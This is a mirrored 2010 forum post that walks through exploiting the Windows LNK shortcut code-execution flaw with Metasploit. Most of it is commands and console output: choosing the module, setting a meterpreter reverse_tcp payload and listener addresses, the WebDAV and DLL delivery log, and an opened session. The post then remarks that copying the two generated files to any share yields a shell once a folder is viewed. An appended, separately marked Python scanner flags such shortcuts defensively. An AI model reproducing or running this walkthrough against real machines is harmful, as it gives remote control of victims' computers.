I'll post something too; nothing technically demanding.
Go easy on me.
...
Microsoft Windows Automatic LNK Shortcut File Code Execution
Tested successfully on XP SP3.
Just read the commands; no introduction.
                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/          \/     \/ |__|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 568 exploits - 284 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
=[ svn r9898 updated today (2010.07.23)
Search for the exploit module:
msf > search lnk
[*] Searching loaded modules for pattern 'lnk'...

Exploits
========

   Name                                                Rank       Description
   ----                                                ----       -----------
   windows/browser/ms10_xxx_windows_shell_lnk_execute  excellent  Microsoft Windows Shell LNK Code Execution
msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options
Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.1.254
SRVHOST => 192.168.1.254
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.1.254
LHOST => 192.168.1.254
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.
msf exploit(ms10_xxx_windows_shell_lnk_execute) >
[*] Started reverse handler on 192.168.1.254:4444
[*]
[*] Send vulnerable clients to \\192.168.1.254\xNocEmT\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*]
[*] Using URL: http://192.168.1.254:80/
[*] Server started.
[*] Sending UNC redirect to 192.168.1.254:25188 ...
[*] Sending UNC redirect to 192.168.1.254:25188 ...
[*] Responding to WebDAV OPTIONS request from 192.168.1.254:25199
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT
[*] Sending 301 for /xNocEmT ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/
[*] Sending directory multistatus for /xNocEmT/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT
[*] Sending 301 for /xNocEmT ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/
[*] Sending directory multistatus for /xNocEmT/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT
[*] Sending 301 for /xNocEmT ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/
[*] Sending directory multistatus for /xNocEmT/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT
[*] Sending 301 for /xNocEmT ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/
[*] Sending directory multistatus for /xNocEmT/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT
[*] Sending 301 for /xNocEmT ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/
[*] Sending directory multistatus for /xNocEmT/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT
[*] Sending 301 for /xNocEmT ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/
[*] Sending directory multistatus for /xNocEmT/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/desktop.ini
[*] Sending 404 for /xNocEmT/desktop.ini ...
[*] Sending LNK file to 192.168.1.254:25199 ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/qkeLNV.dll.manifest
[*] Sending 404 for /xNocEmT/qkeLNV.dll.manifest ...
[*] Sending DLL payload 192.168.1.254:25199 ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25199 /xNocEmT/qkeLNV.dll.123.Manifest
[*] Sending 404 for /xNocEmT/qkeLNV.dll.123.Manifest ...
[*] Sending stage (748032 bytes) to 192.168.1.254
[*] Meterpreter session 1 opened (192.168.1.254:4444 -> 192.168.1.254:25203) at 2010-07-21 11:36:48 +0800
msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -l -v
Active sessions
===============

  Id  Type         Information                  Connection                                 Via
  --  ----         -----------                  ----------                                 ---
  1   meterpreter  CHINA-PC\xia0bai @ CHINA-PC  192.168.1.254:4444 -> 192.168.1.254:25203  exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) >
[*] Responding to WebDAV OPTIONS request from 192.168.1.254:25209
[*] Received WebDAV PROPFIND request from 192.168.1.254:25209 /xNocEmT
[*] Sending 301 for /xNocEmT ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25209 /xNocEmT/
[*] Sending directory multistatus for /xNocEmT/ ...
[*] Received WebDAV PROPFIND request from 192.168.1.254:25209 /xNocEmT/qkeLNV.dll
[*] Sending DLL multistatus for /xNocEmT/qkeLNV.dll ...
[*] Sending DLL payload 192.168.1.254:25209 ...
msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: CHINA-PC\xia0bai
At this point you will see \\192.168.1.254\sjLJL
with two files under it.
This is where the problem lies:
put those two files on any other machine, and all it takes is opening the folder in Explorer
for a shell to come back.
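What the last lines describe (two files on a share, a shell as soon as the folder is browsed) is what a defender wants to find before a user opens it. The following is an added example, not part of the original post or of the Metasploit module: a small Python scanner that parses a shortcut's LinkTargetIDList (MS-SHLLINK) and flags a Control Panel item followed by an explicit .dll or UNC path, which is what makes the shell load a DLL just to draw the icon. The sample shortcut bytes are constructed inline in a simplified layout, and the share name and DLL name are taken from the session above.

```python
# Added example, not from the post: read-only scanner for the shortcut structure abused above.
import struct
import uuid

HEADER_SIZE = 0x4C                  # fixed ShellLinkHeader size
HAS_ID_LIST = 0x1                   # LinkFlags bit: HasLinkTargetIDList
CONTROL_PANEL = uuid.UUID("21EC2020-3AEA-1069-A2DD-08002B30309D")

def parse_id_list(data):
    """Return the ItemID payloads of the LinkTargetIDList (empty if absent)."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    if not flags & HAS_ID_LIST or len(data) < HEADER_SIZE + 2:
        return []
    pos, items = HEADER_SIZE + 2, []
    end = min(pos + struct.unpack_from("<H", data, HEADER_SIZE)[0], len(data))
    while pos + 2 <= end:
        item_size = struct.unpack_from("<H", data, pos)[0]
        if item_size < 2:               # 0x0000 is the TerminalID
            break
        items.append(data[pos + 2:pos + item_size])
        pos += item_size
    return items

def is_control_panel(item):
    # Root-folder style items (0x1F) carry a CLSID at offset 2 of the ItemID data.
    return len(item) >= 18 and uuid.UUID(bytes_le=item[2:18]) == CONTROL_PANEL

def loadable_path(item):
    """UTF-16LE token inside the item that ends in .dll or is a UNC path, else None."""
    for token in item.decode("utf-16-le", errors="ignore").split("\x00"):
        if token.lower().endswith(".dll") or token.startswith("\\\\"):
            return token
    return None

def suspicious_lnk(data):
    """Path that a Control Panel item would make the shell load for its icon, or None."""
    items = parse_id_list(data)
    cpl_at = [i for i, item in enumerate(items) if is_control_panel(item)]
    paths = [loadable_path(item) for item in items[cpl_at[0] + 1:]] if cpl_at else []
    return next((p for p in paths if p), None)

def build_sample(path):
    """Constructed input: header + IDList only, simplified; not a real shortcut."""
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    struct.pack_into("<I", header, 0x14, HAS_ID_LIST)
    items = (b"\x1f\x00" + CONTROL_PANEL.bytes_le, b"\x00\x00" + path.encode("utf-16-le"))
    body = b"".join(struct.pack("<H", len(i) + 2) + i for i in items) + b"\x00\x00"
    return bytes(header) + struct.pack("<H", len(body)) + body
```

Point `suspicious_lnk` at every `.lnk` found on a share before anyone browses it; a shortcut without a Control Panel item, or one whose items carry no DLL or UNC path, returns None.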
This is a mirrored post. Source: 北邮人论坛 / security / #29183, synced 2010/7/23
Xsetc
Mirror-synced 2010/7/23, 0 replies